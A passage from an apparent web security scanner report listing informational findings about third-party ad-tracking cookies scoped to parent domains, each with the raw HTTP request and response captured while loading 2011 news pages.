GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22PayloadType%22%3A%22Requests.External.ArticleRequest%22%2C%22Payload%22%3A%22%7B%5C%22ObjectType%5C%22%3A%5C%22Requests.External.ArticleRequest%5C%22%2C%5C%22ArticleKey%5C%22%3A%7B%5C%22ObjectType%5C%22%3A%5C%22Models.External.ExternalResourceKey%5C%22%2C%5C%22Key%5C%22%3A%5C%2220110508.floridatoday.A9105080319.article.NEWS01%5C%22%7D%2C%5C%22ViewTrackRequest%5C%22%3Afalse%7D%22%7D%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0 HTTP/1.1
Host: sitelife.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:00:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=34faabe1-935e-4483-8538-ddb5398c32aa; domain=floridatoday.com; expires=Tue, 08-May-2012 14:00:40 GMT; path=/
Date: Mon, 09 May 2011 14:00:39 GMT
Content-Length: 3035

PluckSDKjpcb({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.flori
...[SNIP]...
9.83. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304791878

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7850 30800
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 09 May 2011 14:00:07 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=530739&ev=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1304949607; domain=.mathtag.com; path=/; expires=Tue, 08-May-2012 14:00:07 GMT
Content-Length: 0

9.84. http://syndication.mmismm.com/tntwo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&r=&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:46 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sun, 08-May-2016 20:00:46 GMT; path=/; domain=.mmismm.com
Content-Length: 62
Content-Type: text/javascript

var msegs='AG=1;AK=1;AM=1;AQ=1';Mindset.handleResponse(msegs);
9.85. http://t.invitemedia.com/track_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /track_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_imp?partnerID=64&campID=60443&crID=86537&auctionID=13049496061384085-86537&cost=2.1000&pubICode=2250555&pub=321582&url=http%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel HTTP/1.1
Host: t.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:53 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"448473\": [1304949613+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuGYfYNZgFHi7bP571gUGDV65y94x2LAaAHmc4lwrDzLCpTt/N4GlGXQYDBgsGAAit47wCrAJLHlwq+3yKJXPrMA1a5HE30FFGWSeLboB4roivkgcyf3nUYR3Xkf5JZZ89ciRAEj8S6p"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEuZY4CLAKPH22fx3LAaMFmCaS5jjagRQsPN72zsWBQYNBgMGCwag4HpXASaJLRd+vUUWPB4owCyxHk1wWyhQ++S+0yiCe0EWzZq/FiEIAES0Iic="; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
9.86. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=AAU:LCN&si=12177&pi=&xs=3&pu=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story%253Fifu%253D&df=1&v=5.5&cb=96391 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:49 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 14:14:49 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 13:59:49 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305554389|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554389; path=/; expires=Mon, 16-May-11 13:59:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304949589^1304951389|12177^1304949589^1304951389; path=/; expires=Mon, 09-May-11 14:29:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|60203|56835|56987|56761|56681|50213|56780|56232|50220|56768; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,00a1aa9458d8a100f3797a835d7de998; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NjAyMDM6NTY4MzU6NTY5ODc6NTY3NjE6NTY2ODE=; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 10-May-11 13:59:49 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|57094|54243|50961|54209|
...[SNIP]...
9.87. http://tag.contextweb.com/TagPublish/getad.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2555
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:02 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:02 GMT; path=/
Set-Cookie: 536156_4_101378=1304949602182; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524833886248|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:02 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
9.88. http://tags.bluekai.com/site/2731  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2731

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bk=c6b/zCA+ZqtVIHOf; bkc=KJh56XLgHcWDOdeFpTpcKeup//DGhoYAEYCLwaRVN6RBYy+oBFq0S+u/uS0GiPnVck1LjZwOjYqI9yrk8OAnhRjRzzfkjIf8nVqhSzfld1b28lzpYMiL9v0w+mUYAY2ewM9XbL8b3xMT4aeyBj2q2O4REd7uQdHpZFwSFAJQKOlGZEbplcY8tYceIEcoNkJof3K5JC5kQcT02tKco3u8UoFp/ld7LSwaxcVBxCX2U0bbqR47/zh8fx6U1BzaEWqu5of2Ni72Sci2xlgB1w4Ud3qpOr/vkT7E4NKBu4Ktuaz6uJXWoYdXH7Tay70I2ig+bTltsU2w6qfnqnXS87g+9Q2yE4LvJNJt7g6yJH6Npc7+GOKTFNW/fV52S8Mg+Hm6FtxuSBpBrMLZp4USNuV6fl3aR7/m5CgRnyW/zflt1KU55JIt57fpfmPSSSfU73e8wrXPtg6orGdv5rOmrL8yW26FolBZox+7oJdcouFnoUAKqRFtXIPVbwcIpLzmBAwRd7fIfvc7lthEumT5d4FSnXllhV7mSIKHefRPWQ8ce14qLFqxIpF5CcOTDqGlvZlFN5cF0idfXlhmXlpSwTTe9eW=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bkst=KJh5Dn+v96WD7u/QZ1x/kAvyLcHC775ZyY/hgkWCCniSDLALL66QvznrigP4WvpLHHeaH+OYa1PcSI1lVBQ/agqmgANy3LB8z1b59g35HrT572bNYrMKTuADed3eRE3GoDImK7eD/Q3JJxyEbfWKiEyK23u7kzHKO901i9it9/lzddM7j8RvTBSE0CiwHNjTOCwy+ePVVRD8ReqIrceI+XkvDzkV4ek3eMsJ9EHkU9GiZ99Z2sfohLZPTAHimDI6i7ZYWb6GO0Goa09JOPUn8zBi5rnL6gweHyTF/Blof/4qqHsF6TtKUm7poO7xxW1z+jrMRnUhDfN0lCw77DKBrCdTgVTcIlsb8VdvDqycoob1ygPCwh2DnZU+Vu+EQ/ZZPY3lQ3Mh8fZE3tVWuiC+V8wVedCm6AlYfN4cF8KpJHJ9s1WaJ+H2/XjsH0WOjqMHRxuC4gZI5BbpZUXldyJRfc9I; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 14:00:12 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 14:00:12 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=h3IyWOA+ZqtVIHOf; expires=Sat, 05-Nov-2011 14:00:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XLgHaWzOdeF1K1hcL6LuvaHMYaJZRqYhZBkzVlDLnYxjZ1FgbQHWi+3GouNhhuntPQys4W4VYQkpNQGBLuvlIISRIfFnmfi6dN24I4zXpFUUy/1NuADfbSLcmpDIXZFxxQwrf1IDXOCOVO2oi6UO7pL9XBzgfNROcy2vFiSnihbO4jpF7xdwD8pU++UY90r9NtE88RqnCzfRMCduq3kPJgfSS4JHV59n87fL01E6k0Fp4ZCpcgLVecQgNqGGKdnHS4+bO0WmSI2TxJZmGehtqu5jfIlupXjUZIEUMw1dqPdSntIr1JPTFE4Puwulzlua4UuJ6co0TYHUTWygbI2uFBbol7swN/6fpnqqTS8UgF992pxFvvJkJN7p62/hyhpUMFAOH8raunfV5Xj87g+O16FZxxS1FKUlqAAp4UShtxllRI+7qXXKfksZrrNhti2gyKaPZIvfoK0cq0UgMUzuw4abjhobz/obj5Hbzo0S5bw+AU7dKNVbwnIfRX5SGvydE2AfvcdKpmLAByfIF5BxJg7fpE7+4w/O2LvYR57ez4eVUFGdWTl/Hh5Ambmu5+p5wufeLMIFeI7KUdSFt9b9oT=; expires=Sat, 05-Nov-2011 14:00:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 14:00:12 GMT; path=/; domain=.bluekai.com
BK-Server: 9936
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
9.89. http://tags.bluekai.com/site/3358  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3358

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3358?id=wOebwAz4UvVv HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
